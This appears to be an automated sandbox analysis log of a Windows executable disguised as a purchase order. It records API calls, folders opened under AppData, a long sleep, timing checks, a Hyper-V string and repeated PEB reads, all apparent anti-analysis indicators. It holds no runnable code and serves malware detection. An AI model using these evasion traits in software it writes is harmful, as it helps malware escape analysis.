      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; TID: 4280; Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Code function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Code function: 0_2_004065FD FindFirstFileW,FindClose
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Code function: 0_2_00402868 FindFirstFileW
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File opened: C:\Users\user
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File opened: C:\Users\user\AppData
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File opened: C:\Users\user\AppData\Roaming
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450313980.00000000047B8000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450313980.00000000047F6000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000003.2407548173.0000000004810000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450448721.0000000004810000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; API call chain: ExitProcess graph end node (graph_0-4363)
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; API call chain: ExitProcess graph end node (graph_0-4368)
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Code function: 5_2_348E21AE rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Code function: 0_2_0040264A MultiByteToWideChar,ReadFile,LdrInitializeThunk,MultiByteToWideChar,SetFilePointer,LdrInitializeThunk,MultiByteToWideChar,SetFilePointer
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe; Code function: 0_2_70121B63 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489C460 mov ecx, dword ptr fs:[00000030h]5_2_3489C460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E547F mov eax, dword ptr fs:[00000030h]5_2_348E547F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483A470 mov eax, dword ptr fs:[00000030h]5_2_3483A470
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483A470 mov eax, dword ptr fs:[00000030h]5_2_3483A470
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483A470 mov eax, dword ptr fs:[00000030h]5_2_3483A470
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34812582 mov eax, dword ptr fs:[00000030h]5_2_34812582
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34812582 mov ecx, dword ptr fs:[00000030h]5_2_34812582
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34844588 mov eax, dword ptr fs:[00000030h]5_2_34844588
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480758F mov eax, dword ptr fs:[00000030h]5_2_3480758F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480758F mov eax, dword ptr fs:[00000030h]5_2_3480758F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480758F mov eax, dword ptr fs:[00000030h]5_2_3480758F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E59C mov eax, dword ptr fs:[00000030h]5_2_3484E59C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489B594 mov eax, dword ptr fs:[00000030h]5_2_3489B594
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3489B594 mov eax, dword ptr fs:[00000030h]5_2_3489B594
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315A9 mov eax, dword ptr fs:[00000030h]5_2_348315A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315A9 mov eax, dword ptr fs:[00000030h]5_2_348315A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315A9 mov eax, dword ptr fs:[00000030h]5_2_348315A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315A9 mov eax, dword ptr fs:[00000030h]5_2_348315A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315A9 mov eax, dword ptr fs:[00000030h]5_2_348315A9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348905A7 mov eax, dword ptr fs:[00000030h]5_2_348905A7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348905A7 mov eax, dword ptr fs:[00000030h]5_2_348905A7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348905A7 mov eax, dword ptr fs:[00000030h]5_2_348905A7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A35BA mov eax, dword ptr fs:[00000030h]5_2_348A35BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A35BA mov eax, dword ptr fs:[00000030h]5_2_348A35BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A35BA mov eax, dword ptr fs:[00000030h]5_2_348A35BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A35BA mov eax, dword ptr fs:[00000030h]5_2_348A35BA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CF5BE mov eax, dword ptr fs:[00000030h]5_2_348CF5BE
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348345B1 mov eax, dword ptr fs:[00000030h]5_2_348345B1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348345B1 mov eax, dword ptr fs:[00000030h]5_2_348345B1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F5B0 mov eax, dword ptr fs:[00000030h]5_2_3483F5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348AD5B0 mov eax, dword ptr fs:[00000030h]5_2_348AD5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348AD5B0 mov eax, dword ptr fs:[00000030h]5_2_348AD5B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348455C0 mov eax, dword ptr fs:[00000030h]5_2_348455C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E55C9 mov eax, dword ptr fs:[00000030h]5_2_348E55C9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348165D0 mov eax, dword ptr fs:[00000030h]5_2_348165D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484A5D0 mov eax, dword ptr fs:[00000030h]5_2_3484A5D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484A5D0 mov eax, dword ptr fs:[00000030h]5_2_3484A5D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E5D1 mov eax, dword ptr fs:[00000030h]5_2_3484E5D1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E5D1 mov eax, dword ptr fs:[00000030h]5_2_3484E5D1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3488D5D0 mov eax, dword ptr fs:[00000030h]5_2_3488D5D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3488D5D0 mov ecx, dword ptr fs:[00000030h]5_2_3488D5D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E35D7 mov eax, dword ptr fs:[00000030h]5_2_348E35D7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E35D7 mov eax, dword ptr fs:[00000030h]5_2_348E35D7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E35D7 mov eax, dword ptr fs:[00000030h]5_2_348E35D7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348395DA mov eax, dword ptr fs:[00000030h]5_2_348395DA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484C5ED mov eax, dword ptr fs:[00000030h]5_2_3484C5ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484C5ED mov eax, dword ptr fs:[00000030h]5_2_3484C5ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315F4 mov eax, dword ptr fs:[00000030h]5_2_348315F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315F4 mov eax, dword ptr fs:[00000030h]5_2_348315F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315F4 mov eax, dword ptr fs:[00000030h]5_2_348315F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315F4 mov eax, dword ptr fs:[00000030h]5_2_348315F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315F4 mov eax, dword ptr fs:[00000030h]5_2_348315F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348315F4 mov eax, dword ptr fs:[00000030h]5_2_348315F4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34847505 mov eax, dword ptr fs:[00000030h]5_2_34847505
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34847505 mov ecx, dword ptr fs:[00000030h]5_2_34847505
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A6500 mov eax, dword ptr fs:[00000030h]5_2_348A6500
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CB52F mov eax, dword ptr fs:[00000030h]5_2_348CB52F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484D530 mov eax, dword ptr fs:[00000030h]5_2_3484D530
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484D530 mov eax, dword ptr fs:[00000030h]5_2_3484D530
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481D534 mov eax, dword ptr fs:[00000030h]5_2_3481D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481D534 mov eax, dword ptr fs:[00000030h]5_2_3481D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481D534 mov eax, dword ptr fs:[00000030h]5_2_3481D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481D534 mov eax, dword ptr fs:[00000030h]5_2_3481D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481D534 mov eax, dword ptr fs:[00000030h]5_2_3481D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481D534 mov eax, dword ptr fs:[00000030h]5_2_3481D534
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820535 mov eax, dword ptr fs:[00000030h]5_2_34820535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820535 mov eax, dword ptr fs:[00000030h]5_2_34820535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820535 mov eax, dword ptr fs:[00000030h]5_2_34820535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820535 mov eax, dword ptr fs:[00000030h]5_2_34820535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820535 mov eax, dword ptr fs:[00000030h]5_2_34820535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34820535 mov eax, dword ptr fs:[00000030h]5_2_34820535
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E5537 mov eax, dword ptr fs:[00000030h]5_2_348E5537
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BB550 mov eax, dword ptr fs:[00000030h]5_2_348BB550
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BB550 mov eax, dword ptr fs:[00000030h]5_2_348BB550
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BB550 mov eax, dword ptr fs:[00000030h]5_2_348BB550
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484656A mov eax, dword ptr fs:[00000030h]5_2_3484656A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484656A mov eax, dword ptr fs:[00000030h]5_2_3484656A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484656A mov eax, dword ptr fs:[00000030h]5_2_3484656A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484B570 mov eax, dword ptr fs:[00000030h]5_2_3484B570
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484B570 mov eax, dword ptr fs:[00000030h]5_2_3484B570
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34814690 mov eax, dword ptr fs:[00000030h]5_2_34814690
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34814690 mov eax, dword ptr fs:[00000030h]5_2_34814690
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480D6AA mov eax, dword ptr fs:[00000030h]5_2_3480D6AA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480D6AA mov eax, dword ptr fs:[00000030h]5_2_3480D6AA
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348076B2 mov eax, dword ptr fs:[00000030h]5_2_348076B2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348076B2 mov eax, dword ptr fs:[00000030h]5_2_348076B2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348076B2 mov eax, dword ptr fs:[00000030h]5_2_348076B2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348466B0 mov eax, dword ptr fs:[00000030h]5_2_348466B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481B6C0 mov eax, dword ptr fs:[00000030h]5_2_3481B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481B6C0 mov eax, dword ptr fs:[00000030h]5_2_3481B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481B6C0 mov eax, dword ptr fs:[00000030h]5_2_3481B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481B6C0 mov eax, dword ptr fs:[00000030h]5_2_3481B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481B6C0 mov eax, dword ptr fs:[00000030h]5_2_3481B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481B6C0 mov eax, dword ptr fs:[00000030h]5_2_3481B6C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D16CC mov eax, dword ptr fs:[00000030h]5_2_348D16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D16CC mov eax, dword ptr fs:[00000030h]5_2_348D16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D16CC mov eax, dword ptr fs:[00000030h]5_2_348D16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D16CC mov eax, dword ptr fs:[00000030h]5_2_348D16CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484A6C7 mov ebx, dword ptr fs:[00000030h]5_2_3484A6C7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484A6C7 mov eax, dword ptr fs:[00000030h]5_2_3484A6C7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348416CF mov eax, dword ptr fs:[00000030h]5_2_348416CF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CF6C7 mov eax, dword ptr fs:[00000030h]5_2_348CF6C7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483D6E0 mov eax, dword ptr fs:[00000030h]5_2_3483D6E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483D6E0 mov eax, dword ptr fs:[00000030h]5_2_3483D6E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348436EF mov eax, dword ptr fs:[00000030h]5_2_348436EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348906F1 mov eax, dword ptr fs:[00000030h]5_2_348906F1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348906F1 mov eax, dword ptr fs:[00000030h]5_2_348906F1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CD6F0 mov eax, dword ptr fs:[00000030h]5_2_348CD6F0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3488E609 mov eax, dword ptr fs:[00000030h]5_2_3488E609
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34841607 mov eax, dword ptr fs:[00000030h]5_2_34841607
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484F603 mov eax, dword ptr fs:[00000030h]5_2_3484F603
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482260B mov eax, dword ptr fs:[00000030h]5_2_3482260B
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34813616 mov eax, dword ptr fs:[00000030h]5_2_34813616
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34813616 mov eax, dword ptr fs:[00000030h]5_2_34813616
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34852619 mov eax, dword ptr fs:[00000030h]5_2_34852619
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34846620 mov eax, dword ptr fs:[00000030h]5_2_34846620
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34848620 mov eax, dword ptr fs:[00000030h]5_2_34848620
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482E627 mov eax, dword ptr fs:[00000030h]5_2_3482E627
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F626 mov eax, dword ptr fs:[00000030h]5_2_3480F626
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481262C mov eax, dword ptr fs:[00000030h]5_2_3481262C
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E5636 mov eax, dword ptr fs:[00000030h]5_2_348E5636
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482C640 mov eax, dword ptr fs:[00000030h]5_2_3482C640
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484A660 mov eax, dword ptr fs:[00000030h]5_2_3484A660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484A660 mov eax, dword ptr fs:[00000030h]5_2_3484A660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34849660 mov eax, dword ptr fs:[00000030h]5_2_34849660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34849660 mov eax, dword ptr fs:[00000030h]5_2_34849660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348AD660 mov eax, dword ptr fs:[00000030h]5_2_348AD660
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34842674 mov eax, dword ptr fs:[00000030h]5_2_34842674
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B678E mov eax, dword ptr fs:[00000030h]5_2_348B678E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348CF78A mov eax, dword ptr fs:[00000030h]5_2_348CF78A
